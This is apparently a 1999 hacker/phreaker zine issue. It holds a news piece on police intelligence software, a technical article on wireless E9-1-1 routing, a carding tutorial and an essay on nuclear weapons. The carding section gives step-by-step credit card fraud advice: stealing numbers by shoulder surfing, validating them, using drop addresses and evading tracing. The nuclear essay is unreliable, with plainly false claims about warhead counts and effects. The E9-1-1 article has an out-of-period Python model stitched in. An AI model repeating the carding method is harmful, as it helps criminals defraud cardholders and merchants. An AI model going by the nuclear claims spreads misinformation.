Britain's market leaders in intelligence systems are two Cambridge-based IT companies, who showed off their latest wares last week. One of them, i2, claims its Analyst's Notebook is used by all British police forces. The Notebook was used to produce charts for such high profile cases as the Frederick and Rosemary West murder case and for City fraud investigations.

i2's Web site (http://www.i2ltd.demon.co.uk) offers an animated demonstration of how investigative charts are assembled from myriad data inputs. The company describes its "network analysis sub-system" as particularly useful for Internet traffic, as well as for telephone transactions and [bank] account transfers.

The Harlequin group (http://www.harlequin.com) says that its system, Watson, is used around the world to investigate fraud, drug trafficking and organised crime. It too produces large and elaborate charts. Watson is designed to draw information directly from the standard Home Office large major inquiry system - Holmes for short. Watson uses artificial intelligence techniques to automatically distinguish relationships between people, places and objects from the data that is fed in.

For the potentially guilty but not the innocent, recent legal changes mean that defendants can level the playing field by asking the police to hand over their databases. The 1996 Criminal Procedures and Investigations Act requires the police to record inquiries from beginning to end, and to reveal all their material - used or unused - to the Crown Prosecution Service. If information given to the CPS suggests that the defendant might be innocent, or casts doubt on the reliability of prosecution witnesses, the defence has to be told.

Judges have already made at least two orders for the police to copy Holmes databases for the defence to analyse. On the first occasion, however, defence lawyers had no idea how to read the data they were sent.
In the second case, which is still sub judice, specialists have been retained to advise on how to interpret and analyse the police data. Both sides of the courtroom are thus having to come to terms with the new era of electronic transparency.

But, as the law stands, the innocent and uninvolved still have no right to know - let alone protest - that their data too has been mined and warehoused for future use.

These latest findings add more threat to us the phreaking community. -PostalPhreak

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Wireless E-9-1-1 ]::::::::[OO--[ by digiphreq ]-------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Wireless Enhanced 9-1-1 Service- Architecture and future.
By Digiphreq
Darkcyde Communications
5/8/99
darkcyde.8m.com

"A nerd is somebody whose life is focused on computers and technology. A geek is somebody whose life is focused on computers and technology and likes it that way."

Ye Ol'' Table of Contents

I. Introduction
II. A Bit of History
III. FCC Regulations on Wireless 9-1-1
IV. Common Wireline 9-1-1 Service
V. Issues on How to Make Wireless 9-1-1 Work
   1. Stage 1
   2. Stage 2
VI. Long Term & Conclusion

I. Introduction:

As you probably very well know, Enhanced 9-1-1 (E9-1-1) is the most common form of 9-1-1 these days. It is possible to find B9-1-1, if you live in the middle of nowhere... Anyway, today wireline E9-1-1 relays all the important info on you (location, name, and telephone number) to the dispatch telecommunicator, which then accurately routes your call to the proper Emergency Dispatch Station. In theory this makes the whole process faster, so as to get you help quicker, which is often not the case.

With the current day workings of wireless networks, E9-1-1 isn't really possible. They have begun to incorporate technologies to support it though.
This is all because of a bunch of new regulations which the FCC placed on wireless communications, which called for an improvement of the use of E9-1-1. Originally in 1996 they created a two stage time line, which I will be explaining later. A quick overview is that Stage one will require wireless networks to provide the user's call back number and the location, including which cell sector they are in. Stage two allows for a more precise pin point of the caller's location, which requires a bit more hardware and technology.

I will touch on a brief history of Wireline E9-1-1 service, Wireless E9-1-1 service operations (how it should work), and a more detailed overview of the two stage process involved in upgrading the current wireless system.

II. A bit of History:

The first 9-1-1 service was introduced in Alabama in 1968. It's also known as Basic 9-1-1 or B9-1-1. This was a very primitive version of E9-1-1 which only routed your call to a local police station. In the 1980's B9-1-1 was enhanced and there was the introduction of E9-1-1.

[Diagram: Central Office -- 5ESS switch E9-1-1 selective router (routes ANI) -- PSAP, with the Database Management System, Automatic Location Info and Emergency Service Adjunct attached. PSAP displays: Location, Call back #, Mapping Location.]

As you can see (sort of), when a residential or commerce line dials 911, their call goes to the central office switch, which routes the call to an E9-1-1 selective router, which then routes the call to the correct PSAP based on the user's telephone number. The phone number is passed from the PSAP to the Customer Premises Equipment (CPE), which uses it to look up an Automatic Location Information (ALI) database for the user's name and address. On top of all this the user's line number is then used as the call back number in case the caller accidentally hangs up (Ex. the killer hangs up the phone for them...)
or the PSAP dispatcher needs to call the user back.

III. FCC Regulations on Wireless 9-1-1 (This Was Borrowed)

Points of Interest in the FCC Ruling Over Wireless 9-1-1

- Wireless carriers must support call routing based on cell sector, and they must also convey information sufficient to enable the PSAP to call back the 9-1-1 caller (that is, transmit the calling party number) within 18 months of the ruling's effective date. This requirement is sometimes called Stage 1.
- Carriers must support deployment of technology to determine a caller's location within 125m of accuracy for 67% of all wireless 9-1-1 calls within five years of the effective date. Support of a specific location determination, which will require PSAPs to be able to handle coordinates rather than street addresses, is sometimes called Stage 2.
- The FCC will entertain waivers on a case by case basis for not complying with the rules.
- Any call from a handset having a MIN must be transmitted to 9-1-1 even if the handset no longer has valid service. The call may not be intercepted or blocked. The local PSAP may decide whether or not to receive calls from non-MIN telephones, for example phones that were never service activated. If a PSAP requests these calls, the carrier is supposed to provide them.
- The ruling applies to cellular, broadband PCS, and geographic area SMR providers (meaning SMRs that provide mass market services). Systems provided by mobile satellite communications vendors, such as Motorola's Iridium, are not covered by this ruling. Because it is not a federal issue, the FCC has determined that localities and states should plan for cost recovery at their levels. Details of subsidization for deployment and nonsubscriber calls must be negotiated on a local level (State or municipality, similar to landline 9-1-1 subsidization). Funding should be available for both basic and enhanced 9-1-1.

Conditions for Compliance:

1. PSAPs must request and be ready to handle wireless location information.
2. A cost recovery mechanism (negotiated at the local level) must be in place.

PSAP Choices:

Because of the two conditions for compliance, PSAPs effectively choose implementation dates. PSAPs also get to choose whether they want to handle calls from handsets without MINs.

Further Rulings for the Future:

- Tightening of location accuracy requirements to 40 feet 90% of the time,
- Availability of altitude information,
- Performance criteria on time for calling completion,
- Consumer Education programs for wireless 9-1-1,
- Possible reconsideration of issues of PSAP choice, and
- Possible requirement that the strongest signal must carry the 9-1-1 call.

IV. Common Wireline 9-1-1 Service

Today in most areas wireless communication networks have the ability to run off of B9-1-1. This is because of the AUTOPLEX 1000 System. Basically a caller can dial 9-1-1 and be connected to the proper PSAP based on the location of the serving cell. Location routing is accomplished with a digit by digit method, which allows the Automatic Number Identification (ANI) field of Centralized Automatic Message Accounting (CAMA) signaling to carry a number corresponding to the serving cell. Upon arrival at the E9-1-1 selective router the field is used to show the PSAP for that area. The call is then routed.

An alternative to this would be to populate the ANI field with a 7-digit dial-back number as opposed to the location information. The E9-1-1 selective router then assigns the incoming trunk one of four NPAs. The remaining seven digits complete the 10-digit dial-back number.

V. Issues on How to Make Wireless 9-1-1 Work:

There are several wireless problems which limit the use of E9-1-1. First, CAMA trunk signaling transmits one 8-digit telephone number to the PSAP. This causes problems because it can only have 4 NPAs, and therefore cannot give caller identification while wireless subscribers are roaming.
Second, the caller's telephone number cannot be used to route a wireless E9-1-1 call since the caller's location depends on the Mobile Directory Number (MDN). Since a real street address cannot be associated with an MDN, the dispatcher cannot dispatch emergency services.

So while this could seem kind of hopeless, it's really not. A lot of other ways have been devised to handle this all, which commonly involve in-band analog MultiFrequency (MF) signaling. I'll start out with some bad ideas, then explain the good one.

There was the Group D signaling solution. It was first intended for equal access upon long distance calls. It was able to support both a 10-digit ANI and a 10-digit dialed-digits field. Essentially the dialed-digits field could be used for the location information. The problem with this method (and you knew there would be a problem...) is that it cannot support an interface between a Mobile Switching Center (MSC) and the selective router as does Signaling System 7 (SS7).

Next there was a method which used a conversion to CAMA from Group D signaling. This method is fairly complicated and really degrades performance, which makes it a bad choice... here goes an explanation. The idea is that the MSC cannot provide SS7 connectivity with the PSTN and the 9-1-1 selective router cannot support SS7 or Group D signaling for 9-1-1 call processing. A Group D to CAMA translation device between the MSC and the selective router could then provide signaling conversion. The translation device has a third field which sends the 10-digit dial-back number and location information to the ALI database during call set up. The device sends a special 7-digit key value in the ALI field to the selective router. Basically this key would then represent the cell from which the call was placed to the router. Then the 7-digit key field is routed to the PSAP during the setup.
Meanwhile the ALI runs a check by the PSAP using this key's value or field, then it would return the real 10-digit MDN.

Next we have an expanded CAMA signaling solution which has no practical reason for existing. It just won't work. I'll explain it anyway. The existing CAMA interswitch 9-1-1 signaling may be built upon to support a 10-digit ANI and 10-digit location number. This requires some modifications to be made to the current PSAP hardware and the 9-1-1 selective router. This would cause a degradation of the performance due to the extra MF signaling involved.

Finally we have the practical solution, which is what was used mainly for the Stage 1 process: a solution through SS7, which should make hybrid's day. He just can't seem to get enough on SS7. The use of SS7 will be explained in my explanation of what Stage 1 was.

Stage 1:

Basically an entirely new architecture is needed. The common setup was to distribute the service processing across the AUTOPLEX System 1000 MSC, 5ESS-2000 Switch, Emergency Services Adjunct (ESA), ALI database, associated database management system, and the PSAP CPE. The MSC used ISDN-UP signaling to convey a 10-digit dial-back number in the charge number parameter, as well as location information in the caller party number. The 9-1-1 selective router uses the location information to route the call to the appropriate PSAP. An ISDN PSAP is required to receive and use both the 10-digit dial-back number and the location information.

Some major improvements to the AUTOPLEX System 1000 were put into effect for Stage 1. The CAMA signaling is replaced with ISDN-UP, which has the obvious advantage of being able to transmit both the dial-back number and the location information, as opposed to CAMA signaling's 8-digit information. Also, CAMA signaling only supported a 7-digit calling party number unique with one of four area codes, whereas ISDN-UP will support the full 10-digit calling party number.
Another major change was in the MSC, which was then to use ISDN-UP signaling as well. This could convey a 10-digit dial-back number in the charge field and, in the called party number field, a 10-digit routable Directory Number (DN) which represents the cell location and originating service provider. Basically this is used to reach roaming customers. The use of a DN allows a call to be routed through the PSTN to the E9-1-1 selective router grouped with the PSAP without direct connection trunks. The E9-1-1 selective router then selects the appropriate PSAP based on the serving cell, call type, and some other less important criteria. To support this, the dialed-digit routing capability must be integrated with the 5ESS-2000 switch E9-1-1 feature, thus allowing these calls to be routed using the called party number rather than the ANI.

Location information, dial-back number, and service provider are forwarded to the PSAP via ISDN during call setup. An ISDN PSAP is required to receive and use both the dial-back number and the location information encoded in the dialed digits. In the case where the PSAPs cannot support ISDN, an enhanced adjunct processor interface (API) will provide the ability to support existing PSAP CPE, which uses CAMA in-band signaling. The information received via enhanced SS7 ISDN-UP from the MSC to the 5ESS-2000 will be forwarded over the API when the ESA query is made for routing information. The information will then be forwarded to the ALI over a new ESA to ALI interface. The 5ESS switch will then pass a unique 7-digit key value to the PSAP in the ANI field. When the ALI is queried by the PSAP with this value, the location, service provider and dial-back number are returned to the PSAP.

The PSAP equipment would need to be enhanced to provide the caller's location to the telecommunicator using a textual method whereby the called party number is used to query the ALI database, which provides location and identification of the cell/sector.
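The key-based delivery to a CAMA-only PSAP described above, as a simplified model added here (it is not part of the original article or any vendor's code). The class names, the key pool and its release step, and every number are constructed assumptions; the ESA is folded into the router for brevity.

```python
import re

TEN_DIGITS = re.compile(r"\d{10}")


class ALI:
    """ALI database: records staged at call setup, fetched by the PSAP by key."""

    def __init__(self):
        self._staged = {}

    def stage(self, key, record):
        self._staged[key] = record

    def query(self, key):
        return self._staged.get(key)  # None when nothing is staged under key

    def release(self, key):
        self._staged.pop(key, None)


class SelectiveRouter:
    """Routes on the called party number (cell DN) rather than the ANI."""

    def __init__(self, ali, cells, key_pool):
        self.ali = ali
        self.cells = cells               # DN -> (PSAP, cell/sector, provider)
        self.free_keys = list(key_pool)  # 7-digit keys (the pool is an assumption)

    def route(self, setup):
        # Both ISDN-UP fields must be full 10-digit numbers.
        for field in ("charge_number", "called_party_number"):
            if not TEN_DIGITS.fullmatch(setup.get(field, "")):
                raise ValueError("malformed " + field)
        dn = setup["called_party_number"]
        if dn not in self.cells:
            raise LookupError("no cell record for DN " + dn)
        if not self.free_keys:
            raise RuntimeError("no free key for a CAMA PSAP")
        psap, sector, provider = self.cells[dn]
        key = self.free_keys.pop(0)
        # Stage dial-back number, location and provider in the ALI under the key.
        self.ali.stage(key, {"dial_back": setup["charge_number"],
                             "location": sector, "provider": provider})
        # The CAMA PSAP sees only the 7-digit key in the ANI field.
        return {"psap": psap, "ani_field": key}

    def clear(self, key):
        # Unstage before reuse so a later call cannot read a stale record.
        self.ali.release(key)
        self.free_keys.append(key)


def demo():
    ali = ALI()
    cells = {"5550100001": ("PSAP-North", "cell 17 / sector B", "ExampleCell")}
    router = SelectiveRouter(ali, cells, ["5110001"])
    # Constructed setup message, populated the way the text says the MSC does.
    setup = {"charge_number": "5550142424", "called_party_number": "5550100001"}
    delivered = router.route(setup)
    record = ali.query(delivered["ani_field"])  # the PSAP's ALI query
    router.clear(delivered["ani_field"])
    after_clear = ali.query(delivered["ani_field"])
    return delivered, record, after_clear


if __name__ == "__main__":
    print(demo())
```

The model makes the dependency visible: with a CAMA PSAP the dial-back number never travels in the ANI field, so a failed or stale ALI lookup leaves the telecommunicator with nothing but the key.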
Alternatively, Geographic Information Systems (GIS) can be used to provide a geographic representation of a caller's approximate location on a computer-generated map. The PSAP GIP map displays provide the dispatcher with visual identification of the caller's location (their cell/sector) in perspective of other important geological locations. The displays can pinpoint roads, addresses, buildings, houses, EMS dispatch vehicles, fire hydrants, cell sites, and the service boundaries to emergency services.

Ok, so since this was originally put to use back in '96 and was to last for a period of approximately 18 months, it has for the most part gone into effect in most areas. It's hard to say though, depending on the area....

Stage 2: Stage 2 is basically just an architectural build on what was created in Stage 1. The implementation was to last nearly 5 years. Stage 2 would bring new GIS capabilities along which would work better with the wireless E9-1-1 system. During this stage the geolocation system was required to meet the FCC's 5 year requirements for wireless E9-1-1. So the wireless system could communicate with the geolocation system to determine the position of a target mobile terminal (which has dialed 9-1-1). Alternatively, if the wireless system recognizes a mobile telephone equipped with GPS, the mobile terminal could provide its current location via new air interface messages.

Several technologies have been proposed to meet the FCC's long term mobile locating requirements for wireless E9-1-1 systems. To meet the needs of the 9-1-1 community, that is, those who provide the emergency response service to the public, the existing base of mobile phones must be supported without modification. Promising technologies proposed for this purpose include time difference of arrival and direction of arrival triangulation systems. Each has its advantages depending on the physical environment in which it is targeted to be deployed.
In addition, advances in GPS receiver technology have made it possible to integrate GPS with wireless telephones, which has recently been brought somewhat into the commercial market. If the mobile terminal knows its location, it makes sense to use this information for the E9-1-1 system because the GPS is potentially much more accurate than a location determined by means of time difference of arrival and direction of arrival triangulation.

The geolocation information (latitude, longitude, altitude, and accuracy) will be integrated in an SS7/ISDN-UP and ISDN call set-up message for the 9-1-1 call. At this point in the evolution, SS7/ISDN-UP and the Transaction Capabilities Application Part (TCAP) signaling protocols will be modified to support transmission of the location information from the wireless system to the selective router. ISDN-UP will be used for delivery of location information with call set-up, while TCAP messages will be used to support caller location tracking, which requires location updates during a call.

Regardless of the location technology used by a wireless service provider, the location information will be passed through the network and used in a standard way. Therefore, the E9-1-1 communications network infrastructure will remain implemented in the wireless network. Although not required by FCC rule making, the new location information can be used to route a call to a PSAP accurately. Upgrades to support this capability include geolocation routing capabilities that will be integrated into the 5ESS-2000 switch's E9-1-1 feature, the ESA, and the DBMS.

Once again, the information is delivered to the PSAP, and computer aided dispatch systems with GIS mapping will be used to portray the information in a way that makes it easily understandable by the telecommunicator and responding emergency personnel. In turn, the improved location information will be reflected in the GIS map display with a pinpointed location and associated accuracy representation.
A GIS based service administration capability will provide the ability to define and dynamically change municipal jurisdictional boundaries and emergency service zones via a computerized map interface. This administration system will indirectly maintain the call routing data used by the 9-1-1 selective router. The process will simplify the administration of the 9-1-1 service by eliminating the need to share cell/sector location data among wireless, local exchange, and emergency service providers. In this environment, base station reconfigurations by a wireless service provider will no longer affect the data maintained in the PSTN and PSAP providing the end-to-end E9-1-1 service.

Onward to my brief explanation of triangulation and geolocations.

Network based triangulation methods of location (TDOA and DOA) require that at least two DOA or three TDOA receivers locate the target mobile terminal and that some technique be available to resolve ambiguities caused by multipath propagation. These requirements may be difficult to meet in many wireless environments, causing the accuracy of the locating system to be degraded or making system deployment cost prohibitive. For example, in rural environments, cell sites cover very large geographical areas, often resulting in marginal voice coverage on the fringes of the cells. In such areas, it is unlikely that receivers in multiple cell sites would "see" the mobile terminal, thereby making it difficult or impossible to establish the caller's location. This problem could be worked around by adding supplementary location receivers, although such deployment might be very costly for rural wireless service providers.

Furthermore, in dense urban areas, the effect of multipath propagation becomes a dominant factor in deterioration of the accuracy of the locating system. Multipath propagation refers to multiple copies of the same transmitted signal being received by an antenna.
Usually, the first signal arrives via the most direct path from the transmitter. Additional copies of the signal are received at later times, ranging from hundreds of nanoseconds to tens of microseconds later, and they then overlap the first signal. These copies result from the reflection of the original signal from various objects, such as buildings and vehicles. The effects of multipath propagation, particularly in cities, can degrade the precision of the location estimate to such a point that no added benefit can be gained over visually reporting the serving cell/sector location, because urban environments often have relatively dense micro cell grids for their wireless networks. These problems are difficult to overcome without some assistance from the mobile telephone. Whether or not the FCC requirement of 125m accuracy will be technically or economically feasible in such environments is not clear.

VI. Long Term & Conclusion

Although recent FCC ruling only requires location accuracy of 125m in 67% of all cases, the public safety community often requires even more accurate information. Ideally an emergency unit responding to a 9-1-1 call would know exactly which room in a skyscraper the incident is occurring or has occurred in (using, for instance, the ISDN-UP altitude parameter). Clearly this level of accuracy cannot be achieved cost effectively with unmodified wireless phones and today's technology. With new technology and assistance from the mobile terminal, however, future land based location systems will be able to provide much better accuracy than that of the FCC Stage 2 requirements. Although such systems are not available today, several concepts have been proposed, for example signpost location beacons and specialized signaling schemes optimized for location purposes. Whatever scheme becomes dominant as the technology matures, the pursuit of standard implementations is important.
This will ensure that the costs associated with an improved wireless E9-1-1 system are reduced.

Basically really from a safety standpoint all this is really fine in my opinion. It will help save other people and possibly yourself one day. Meanwhile this isn't really a cell user's friend. This gives the wireless service providers more control over you with this type of technology, which can be looked at as a very bad thing. Anyway, peace.

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Carding ]::::::::[OO--[ by kryptus ]------------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Hello boys and girls welcome and listen up as I am about to put some data in that little brain of yours.Well let me tell you carding has changed so much since I first started but now I have quit and have moved on to other things and would like to pass my knowledge down to you young'ns.Well to start off when trying to find a CC never go dumpster diving its nothing but a thing of the past.It can be done but is very hard to do.The best way is to shoulder surf or to work at a job where they use Credit cards such as a store in the mall.The way to find out how much is left or if it works is to use a merchant # these are used by sales people to validate that a CC works correctly.There are two ways to do this find a port site or phone # and enter in the CC info and if it works you might have yourself a CC but a much better way is either an online or phone merchant this gives you details on the limit and how much is left to spend.Next you need to find yourself a nice place to card this stuff to and no matter what never ever ever ever card to your own house.Find an abandon apartment or house and leave a note on the door if you know the delievery date or just leave it on their with a message saying I am currently moving in and please just leave my package in front of my door or behind some bushes and then you
need to make sure no one is watching you make sure this drop area is far away and not next door,because when the police come by the first ask the neighbors thats you questions and investigate.Also now a days a computer monitors CC use so if someone usually orders 50-200 dollar stuff each time they use it and then a 500 dollar charge appears the card is frozen and call the owner of the card on the number given no matter what number is given to the clerk and is verified to make sure it is not fraud so I suggest only buy small things under 200 dollars that way you actually can get what you want so dont try and order a laptop trust me it wont go through.What you should buy is either clothes,CDs, RAM ,Modem,or anything thats doesn't say expensive when you think about it.Now to try and not get caught.Well either use a proxy server when you do this so your IP wont be on their server because each time you order they keep your IP for refernce to find out who made the order.Also if you are on Dial Up they can easily find you if you dont use a proxy notice when you log in notice the word LOG yes they log what phone # use this IP at what time so your ISP could easily find out who it was.Or if you call which is much better and safer call from a payphone or a cloned cell phone and never your home phone because the companies use ANI and generally *67 or but maybe an op divert will but I strongly suggest the first two methods listed.Becareful and dont get caught. This has been brought to you by Kryptus kryptus@deep-house.com -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::[ Political views ]::::::::[OO--[ by nino ]------------------------- -->]OO[:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .-. .-. .--' / \ '--. '--. \ _______ / .--' \ \ .-" "-. / / \ \ / nino \ / / \ / \ / [ Poloticol Views ] \| .--. .--. 
|/ [ Volume One ] | )/ | | \( | [ nino ] |/ \__/ \__/ \| [] / /^\ \ \__ '=' __/ |\ /| |\'"VUUUV"'/| \ `"""""""` / [ Greets : Darkcyde ] `-._____.-' [ hybrid ] / / \ \ [ darkcyde.8m.com ] / / \ \ / / \ \ ,-' ( ) `-, `-'._) (_.'-`
--------------------------------------------------------------------

Political views: .'`Nuclear Warheads`'.

Many of us know about the United States Army, and how they work. But allow me to explain in detail some of the problems the U.S faces by withholding a nuclear warhead. The major problem is that there are other countries trying to make warheads to be able to compete in the United States Strategic Warfare, Minor Authority in communications and prospects. These countries such as Kuwait, Kosovo, and many others feel like they are being controlled by the U.S military and the army. But what is it they really fear? Is it our population count for our armed services? Is it our communications\technology power? Or is it the nuclear bombs? Yes indeed, it is.

The United States have 7 nuclear warheads known to public that are stationed in multiple spots around the country. There is just one problem. What about the other 11 secret warheads that the U.S has? Yes indeed, the United States Government has a total of 18 nuclear warheads ready for use. That is a lot of power. The only problem is, they are more chemical than anything. They use a substance known as Petroleum and mix it with quantum levels of cells and chemicals that are more deadly than the bomb itself. Remember hearing about the 'Black plague' in or at school? Well, there is a certain amount of volume\mass mixtures that create a deadly killer cell that we breathe. This cell attacks the immune system and creates visionary problems as well as breathing. Sooner or later u will die. There is no cure. There is a lot more to it than just that, but allow me to tell you about the major problem that i 'View' in my own mind.
The United States government has 18 nuclear warheads ready for use in case of a national emergency. But think of it this way. Other countries have these chemical weapons too, such as Russia \ UK. This creates a problem now. If we ever have a nuclear war, and we bomb a country with nuclear weapons who in return does the same to us, our planet (Earth) 'could' be knocked off its axis. Ever think of that? Or could cause a meltdown, or a series of storms that will certainly take most of us out. But another problem is a nuclear bomb has more power than that comet that wiped out the dinosaurs. We could not possibly survive a nuclear war with another country. It is utterly impossible. And don't say 'i have a bomb shelter and food rations' because what happens when u run out of water\food? U will have nothing. Or what happens if the earth is knocked off its axis? A bomb shelter won't protect u from being killed by gravity.

Hell, nuclear bombs react to metallic and electrical machinery, almost like a 500 st magnet. Ur watches will stop, radios will be fried, cars will be ripped apart by radiation, gold teeth will be forcefully pulled from ones mouth, and ur bomb shelter could have a 99% chance of being torn out of the ground and torn to pieces, depending on ur location. The nuclear warheads that Russia possess can destroy a lot of things. Say for instance they dropped the bomb on our states capitol. Half the states around it would be utterly destroyed, not to mention the others that are left will suffer from radiation cancer, poisoning and also no light. If it shifts the gravitational pull u will be ripped apart not only from the lack of air to breathe but because the radiation opens the pores of your skin and eats away at your protective white cells.

There isn't much we can do about this right now. But maybe, just maybe, some of you who are leaders will try as hard as they can to speak to the public and rage protests against nuclear warheads, and maybe even war.
---------------------------------------- nino ----------------------

-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Outness ]::::::::[OO--[ by hybrid ]-------------------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

HEH, that's it for this issue of f41th dudes. We really need some feedback on our zine so if there's anyone out there that wants to give us a slagging or anything, email hybrid@phunc.com. You can get f41th from www.darkcyde.8m.com, www.darkcyde.system7.org or from my site www.phunc.com/~hybrid. Shouts to everyone in #darkcyde EFNET, werd, also #9x + #b4b0. Hope you enjoyed f41th issue 5, keep reading.. peace.

O y34H, alm0st fOrgOt b1tch3z, dOn't fOrg3t tO t4k3 j00r k4fF3nœ p1llz.. h4x0r1ng l1f3 jUsT wOulDn`T b3 d4 s4m3 w1thOut `3m.. *WERD*

[c] D4RKCYDE 1999 (darkcyde.8m.com | darkcyde.system7.org) #darkcyde EFNET